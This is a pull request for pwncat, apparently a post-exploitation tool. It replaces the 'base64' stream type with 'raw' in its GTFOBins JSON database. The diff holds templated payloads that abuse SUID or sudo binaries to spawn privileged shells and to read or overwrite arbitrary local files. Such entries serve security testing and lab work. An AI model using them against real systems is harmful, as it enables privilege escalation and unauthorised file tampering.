### PR TITLE
Remove All Base64 References from GTFOBins Database

### DIFF
--- a/pwncat/data/gtfobins.json
+++ b/pwncat/data/gtfobins.json
@@ -25,18 +25,8 @@
   "cp": [
     {
       "type": "write",
-      "stream": "print",
+      "stream": "raw",
       "payload": "TF=none; {command}; TF=$({mktemp}); {chmod} ugo+r $TF; {cat} > $TF; {command}; rm -f $TF",
-      "args": [
-        "$TF",
-        "{lfile}"
-      ],
-      "exit": "{ctrl_d}"
-    },
-    {
-      "type": "write",
-      "stream": "base64",
-      "payload": "TF=none; {command}; TF=$({mktemp}); {chmod} ugo+r $TF; {base64} -d > $TF; {command}; rm -f $TF",
       "args": [
         "$TF",
         "{lfile}"
@@ -67,11 +57,11 @@
     },
     {
       "type": "write",
-      "stream": "base64",
+      "stream": "raw",
       "payload": "{command}",
       "args": [
         "-c",
-        "'{base64} -d > {lfile}'"
+        "'cat - > {lfile}'"
       ],
       "suid": [
         "-p"
@@ -99,8 +89,8 @@
     },
     {
       "type": "write",
-      "stream": "base64",
-      "payload": "{command} -c '{base64} -d > {lfile}'",
+      "stream": "raw",
+      "payload": "{command} -c 'cat - > {lfile}'",
       "suid": [
         "-p"
       ],
@@ -168,8 +158,8 @@
     },
     {
       "type": "write",
-      "stream": "base64",
-      "payload": "{command} -c '{base64} -d > {lfile}'",
+      "stream": "raw",
+      "payload": "{command} -c 'cat - > {lfile}'",
       "suid": [
         "-p"
       ],
@@ -388,43 +378,11 @@
     },
     {
       "type": "write",
-      "stream": "base64",
+      "stream": "raw",
       "payload": "{command}",
       "args": [
         "-c",
-        "\"{base64} -d > {lfile}\"",
-        "-b"
-      ],
-      "exit": "{ctrl_d}{ctrl_d}"
-    }
-  ],
-  "bsd-csh": [
-    {
-      "type": "shell",
-      "payload": "{command}",
-      "input": "{shell} -p\n",
-      "suid": [
-        "-b"
-      ],
-      "exit": "exit\nexit\n"
-    },
-    {
-      "type": "read",
-      "stream": "print",
-      "payload": "{command}",
-      "args": [
-        "-c",
-        "\"{cat} {lfile}\"",
-        "-b"
-      ]
-    },
-    {
-      "type": "write",
-      "stream": "base64",
-      "payload": "{command}",
-      "args": [
-        "-c",
-        "\"{base64} -d > {lfile}\"",
+        "\"cat - > {lfile}\"",
         "-b"
       ],
       "exit": "{ctrl_d}{ctrl_d}"
@@ -441,33 +399,12 @@
       ]
     },
     {
-      "type": "read",
-      "stream": "base64",
-      "payload": "{command} | {base64} -w 0",
-      "args": [
-        "-s",
-        "file://{lfile} --output -"
-      ]
-    },
-    {
       "type": "write",
       "stream": "print",
       "payload": "TF=none; {command}; TF=$({mktemp}); {chmod} ugo+r $TF; {cat} > $TF; {command}; rm -f $TF",
       "args": [
         "-s",
         "file://$TF --output {lfile}"
-      ],
-      "exit": "{ctrl_d}"
-    },
-    {
-      "type": "write",
-      "stream": "base64",
-      "payload": "TF=none; {command}; TF=$({mktemp}); {chmod} ugo+r $TF; {base64} -d > $TF; {command}; rm -f $TF",
-      "args": [
-        "-s",
-        "file://$TF",
-        "--output",
-        "{lfile}"
       ],
       "exit": "{ctrl_d}"
     }
@@ -556,8 +493,8 @@
     },
     {
       "type": "write",
-      "stream": "base64",
-      "payload": "TF=none; {command} -h 2>/dev/null 1>&2; TF=$({mktemp} -d); {cat} > $TF/b64; echo \"import os; os.execl('''{python}''', 'python', '''-c''', '''import base64\\nwith open('{lfile}','wb') as h:\\n\\tfor line in open('$TF/b64', 'rb'):\\n\\t\\th.write(base64.b64decode(line.strip()))''')\" > $TF/setup.py; {command} $TF 2>/dev/null; {rm} -f $TF/b64",
+      "stream": "raw",
+      "payload": "TF=none; {command} -h 2>/dev/null 1>&2; TF=$({mktemp} -d); {cat} > $TF/x; echo \"import os; os.execl('''{python}''', 'python', '''-c''', '''import shutil\\nwith open('{lfile}','wb') as h:\\n\\twith open('$TF/x', 'rb') as x:\\n\\t\\tshutil.copyfileobj(x, h)''')\" > $TF/setup.py; {command} $TF 2>/dev/null; {rm} -rf $TF",
       "args": [],
       "exit": "{ctrl_d}{ctrl_d}"
     }
@@ -744,12 +681,12 @@
     },
     {
       "type": "write",
-      "stream": "base64",
+      "stream": "raw",
       "payload": "{command}",
       "args": [
         "-u",
         "/",
-        "{sh} -c \"{base64} -d > {lfile}\""
+        "{sh} -c \"cat > {lfile}\""
       ],
       "exit": "{ctrl_d}{ctrl_d}"
     }
@@ -864,27 +801,13 @@
     },
     {
       "type": "write",
-      "stream": "print",
+      "stream": "raw",
       "payload": "{command}",
       "args": [
         "-q",
         "-nx",
         "-ex",
-        "'python import sys; open(\"{lfile}\",\"w\").write(sys.stdin.read())'",
-        "-ex",
-        "quit"
-      ],
-      "exit": "{ctrl_d}{ctrl_d}"
-    },
-    {
-      "type": "write",
-      "stream": "base64",
-      "payload": "{command}",
-      "args": [
-        "-q",
-        "-nx",
-        "-ex",
-        "'python import sys,base64; exec(\"\"\"with open(\"{lfile}\",\"wb\") as f:\\n\\tfor line in sys.stdin:\\n\\t\\tf.write(base64.b64decode(line.strip()))\"\"\")'",
+        "'python import sys,shutil; shutil.copyfileobj(sys.stdin.buffer, open(\"{lfile}\",\"wb\"))'",
         "-ex",
         "quit"
       ],
@@ -1041,8 +964,8 @@
     },
     {
       "type": "write",
-      "stream": "base64",
-      "payload": "{base64} -d | {command}",
+      "stream": "raw",
+      "payload": "{cat} - | {command}",
       "args": [
         "-f",
         "8859_1",
@@ -1089,17 +1012,8 @@
     },
     {
       "type": "write",
-      "stream": "print",
-      "payload": "TF=$({mktemp}); echo 'File.open(\"{lfile}\", \"w+\") {{ |f| f.write(ARGF.read) }}' > $TF; {command}",
-      "args": [
-        "$TF"
-      ],
-      "exit": "{ctrl_d}{ctrl_d}"
-    },
-    {
-      "type": "write",
-      "stream": "base64",
-      "payload": "TF=$({mktemp}); echo 'File.open(\"{lfile}\", \"w+\") {{ |f| f.write(ARGF.read) }}' > $TF; {base64} -d | {command}",
+      "stream": "raw",
+      "payload": "TF=$({mktemp}); echo 'File.open(\"{lfile}\", \"w+\") {{ |f| f.write(ARGF.read) }}' > $TF; {command}; rm -f $TF",
       "args": [
         "$TF"
       ],
@@ -1124,17 +1038,8 @@
     },
     {
       "type": "write",
-      "stream": "print",
+      "stream": "raw",
       "payload": "TF=$({mktemp}); echo 'File.open(\"{lfile}\", \"w+\") {{ |f| f.write(ARGF.read) }}' > $TF; {command}",
-      "args": [
-        "$TF"
-      ],
-      "exit": "{ctrl_d}{ctrl_d}"
-    },
-    {
-      "type": "write",
-      "stream": "base64",
-      "payload": "TF=$({mktemp}); echo 'File.open(\"{lfile}\", \"w+\") {{ |f| f.write(ARGF.read) }}' > $TF; {base64} -d | {command}",
       "args": [
         "$TF"
       ],
@@ -1201,11 +1106,11 @@
     },
     {
       "type": "write",
-      "stream": "base64",
+      "stream": "raw",
       "payload": "{command}",
       "args": [
         "-c",
-        "\"{base64} -d > {lfile}\""
+        "\"cat - > {lfile}\""
       ],
       "exit": "{ctrl_d}{ctrl_d}"
     }
@@ -1231,11 +1136,11 @@
     },
     {
       "type": "write",
-      "stream": "base64",
+      "stream": "raw",
       "payload": "{command}",
       "args": [
         "-c",
-        "\"{base64} -d > {lfile}\""
+        "\"cat - > {lfile}\""
       ],
       "exit": "{ctrl_d}{ctrl_d}"
     }
@@ -1367,8 +1272,8 @@
     },
     {
       "type": "write",
-      "stream": "base64",
-      "payload": "{command} /etc/hosts; TF=$({mktemp} -u); {base64} -d > $TF; {command} < $TF; {rm} -f $TF",
+      "stream": "raw",
+      "payload": "{command} /etc/hosts; TF=$({mktemp} -u); cat - > $TF; {command} < $TF; {rm} -f $TF",
       "input": "q",
       "exit": "{ctrl_d}{ctrl_d}s{lfile}\nq\n"
     }
@@ -1502,8 +1407,8 @@
   "mv": [
     {
       "type": "write",
-      "stream": "base64",
-      "payload": "TF=$({mktemp} -u); {base64} -d > $TF; {command}; {rm} -f $TF",
+      "stream": "raw",
+      "payload": "TF=$({mktemp} -u); {cat} > $TF; {command}; {rm} -f $TF",
       "args": [
         "$TF",
         "{lfile}"
@@ -1647,8 +1552,8 @@
     },
     {
       "type": "write",
-      "stream": "base64",
-      "payload": "{base64} -d | {command}",
+      "stream": "raw",
+      "payload": "{command}",
       "args": [
         "enc",
         "-out",
@@ -2009,10 +1914,11 @@
     },
     {
       "type": "write",
-      "stream": "base64",
-      "payload": "TF=$({mktemp} -d); {cat} > $TF/b64; {command} -c \"exec('''import base64,os\\n\\nwith open('{lfile}','wb') as h:\\n\\tfor line in open('$TF/b64', 'rb'):\\n\\t\\th.write(base64.b64decode(line.strip()))''')\"; {rm} -f $TF/b64",
+      "stream": "raw",
+      "payload": "{command}",
       "args": [
-        ""
+        "-c",
+        "exec('''import shutil, sys\\nshutil.copyfileobj(sys.stdout.buffer, open('{lfile}', 'wb'))''')"
       ],
       "exit": "{ctrl_d}{ctrl_d}"
     }
@@ -2037,10 +1943,11 @@
     },
     {
       "type": "write",
-      "stream": "base64",
-      "payload": "TF=$({mktemp} -d); {cat} > $TF/b64; {command} -c \"exec('''import base64,os\\n\\ntry:\\n\\twith open('{lfile}','wb') as h:\\n\\t\\tfor line in open('$TF/b64', 'rb'):\\n\\t\\t\\th.write(base64.b64decode(line.strip()))\\nexcept:\\n\\twhile 1:\\n\\t\\tsys.stdin.read()''')\"; {rm} -f $TF/b64",
+      "stream": "raw",
+      "payload": "{command}",
       "args": [
-        ""
+        "-c",
+        "exec('''import shutil, sys\\nshutil.copyfileobj(sys.stdout.buffer, open('{lfile}', 'wb'))''')"
       ],
       "exit": "{ctrl_d}{ctrl_d}"
     }
@@ -2065,10 +1972,11 @@
     },
     {
       "type": "write",
-      "stream": "base64",
-      "payload": "TF=$({mktemp} -d); {cat} > $TF/b64; {command} -c \"exec('''import base64,os\\n\\ntry:\\n\\twith open('{lfile}','wb') as h:\\n\\t\\tfor line in open('$TF/b64', 'rb'):\\n\\t\\t\\th.write(base64.b64decode(line.strip()))\\nexcept:\\n\\twhile 1:\\n\\t\\tsys.stdin.read()''')\"; {rm} -f $TF/b64",
+      "stream": "raw",
+      "payload": "{command}",
       "args": [
-        ""
+        "-c",
+        "exec('''import shutil, sys\\nshutil.copyfileobj(sys.stdout.buffer, open('{lfile}', 'wb'))''')"
       ],
       "exit": "{ctrl_d}{ctrl_d}"
     }
@@ -2093,10 +2001,11 @@
     },
     {
       "type": "write",
-      "stream": "base64",
-      "payload": "TF=$({mktemp} -d); {cat} > $TF/b64; {command} -c \"exec('''import base64,os\\n\\ntry:\\n\\twith open('{lfile}','wb') as h:\\n\\t\\tfor line in open('$TF/b64', 'rb'):\\n\\t\\t\\th.write(base64.b64decode(line.strip()))\\nexcept:\\n\\twhile 1:\\n\\t\\tsys.stdin.read()''')\"; {rm} -f $TF/b64",
+      "stream": "raw",
+      "payload": "{command}",
       "args": [
-        ""
+        "-c",
+        "exec('''import shutil, sys\\nshutil.copyfileobj(sys.stdout.buffer, open('{lfile}', 'wb'))''')"
       ],
       "exit": "{ctrl_d}{ctrl_d}"
     }
@@ -2121,10 +2030,11 @@
     },
     {
       "type": "write",
-      "stream": "base64",
-      "payload": "TF=$({mktemp} -d); {cat} > $TF/b64; {command} -c \"exec('''import base64,os\\n\\ntry:\\n\\twith open('{lfile}','wb') as h:\\n\\t\\tfor line in open('$TF/b64', 'rb'):\\n\\t\\t\\th.write(base64.b64decode(line.strip()))\\nexcept:\\n\\twhile 1:\\n\\t\\tsys.stdin.read()''')\"; {rm} -f $TF/b64",
+      "stream": "raw",
+      "payload": "{command}",
       "args": [
-        ""
+        "-c",
+        "exec('''import shutil, sys\\nshutil.copyfileobj(sys.stdout.buffer, open('{lfile}', 'wb'))''')"
       ],
       "exit": "{ctrl_d}{ctrl_d}"
     }
@@ -2149,10 +2059,11 @@
     },
     {
       "type": "write",
-      "stream": "base64",
-      "payload": "TF=$({mktemp} -d); {cat} > $TF/b64; {command} -c \"exec('''import base64,os\\n\\ntry:\\n\\twith open('{lfile}','wb') as h:\\n\\t\\tfor line in open('$TF/b64', 'rb'):\\n\\t\\t\\th.write(base64.b64decode(line.strip()))\\nexcept:\\n\\twhile 1:\\n\\t\\tsys.stdin.read()''')\"; {rm} -f $TF/b64",
+      "stream": "raw",
+      "payload": "{command}",
       "args": [
-        ""
+        "-c",
+        "exec('''import shutil, sys\\nshutil.copyfileobj(sys.stdout.buffer, open('{lfile}', 'wb'))''')"
       ],
       "exit": "{ctrl_d}{ctrl_d}"
     }
@@ -2177,10 +2088,11 @@
     },
     {
       "type": "write",
-      "stream": "base64",
-      "payload": "TF=$({mktemp} -d); {cat} > $TF/b64; {command} -c \"exec('''import base64,os\\n\\ntry:\\n\\twith open('{lfile}','wb') as h:\\n\\t\\tfor line in open('$TF/b64', 'rb'):\\n\\t\\t\\th.write(base64.b64decode(line.strip()))\\nexcept:\\n\\twhile 1:\\n\\t\\tsys.stdin.read()''')\"; {rm} -f $TF/b64",
+      "stream": "raw",
+      "payload": "{command}",
       "args": [
-        ""
+        "-c",
+        "exec('''import shutil, sys\\nshutil.copyfileobj(sys.stdout.buffer, open('{lfile}', 'wb'))''')"
       ],
       "exit": "{ctrl_d}{ctrl_d}"
     }
@@ -2268,17 +2180,8 @@
     },
     {
       "type": "write",
-      "stream": "print",
+      "stream": "raw",
       "payload": "TF=$({mktemp}); echo 'File.open(\"{lfile}\", \"w+\") {{ |f| f.write(ARGF.read) }}' > $TF; {command}",
-      "args": [
-        "$TF"
-      ],
-      "exit": "{ctrl_d}{ctrl_d}"
-    },
-    {
-      "type": "write",
-      "stream": "base64",
-      "payload": "TF=$({mktemp}); echo 'File.open(\"{lfile}\", \"w+\") {{ |f| f.write(ARGF.read) }}' > $TF; {base64} -d | {command}",
       "args": [
         "$TF"
       ],
@@ -2303,17 +2206,8 @@
     },
     {
       "type": "write",
-      "stream": "print",
+      "stream": "raw",
       "payload": "TF=$({mktemp}); echo 'File.open(\"{lfile}\", \"w+\") {{ |f| f.write(ARGF.read) }}' > $TF; {command}",
-      "args": [
-        "$TF"
-      ],
-      "exit": "{ctrl_d}{ctrl_d}"
-    },
-    {
-      "type": "write",
-      "stream": "base64",
-      "payload": "TF=$({mktemp}); echo 'File.open(\"{lfile}\", \"w+\") {{ |f| f.write(ARGF.read) }}' > $TF; {base64} -d | {command}",
       "args": [
         "$TF"
       ],
@@ -2468,19 +2362,8 @@
     },
     {
       "type": "write",
-      "stream": "print",
+      "stream": "raw",
       "payload": "{command} 2>/dev/null",
-      "args": [
-        "-u",
-        "STDIN",
-        "CREATE:{lfile}"
-      ],
-      "exit": "{ctrl_d}"
-    },
-    {
-      "type": "write",
-      "stream": "base64",
-      "payload": "{base64} -d | {command} 2>/dev/null",
       "args": [
         "-u",
         "STDIN",
@@ -2701,8 +2584,8 @@
   "tee": [
     {
       "type": "write",
-      "stream": "base64",
-      "payload": "{base64} -d | {command} >/dev/null",
+      "stream": "raw",
+      "payload": "{command} >/dev/null",
       "args": [
         "{lfile}"
       ],


### PR DESCRIPTION
## Description of Changes

The `base64` stream type in `gtfobins.json` is no longer valid, but there were entries left behind using it. This pull request is meant to remove all remnants of that stream type due to the updates to `LinuxFile` which now supports raw data without any encoding.

I've tested the changes so far with the Peak Hill room, but I need to go through and test each possible GTFObin transfer method to make sure it's working properly. Before merging this, I want to write proper unit tests that will test each one explicitly to make sure they all work.

Fixes #173.

## Major Changes Implemented:
- Remove GTFOBins `base64` stream type

## Pre-Merge Tasks
- [ ] Formatted all modified files w/ `python-black`
- [ ] Sorted imports for modified files w/ `isort`
- [ ] Ran `flake8` on repo, and fixed any new problems w/ modified files
- [ ] Ran `pytest` test cases
- [ ] Added brief summary of updates to CHANGELOG (under `[Unreleased]`)

**For issues with pre-merge tasks, see CONTRIBUTING.md**

<!--
If you are submitting a pull request for a new module, the following
information is also helpful:

## Platform and Environment Restrictions
(e.g. "Windows targets without HOTFIX XXXXXX")

## Full Qualified Module Name
(e.g. "linux.enumerate.system.network")

## Artifacts Generated
(e.g. "creates file at /etc/something.ini tracked w/ a tamper")

## Tested Targets
(e.g. "Tested on Windows 10 1604")
-->
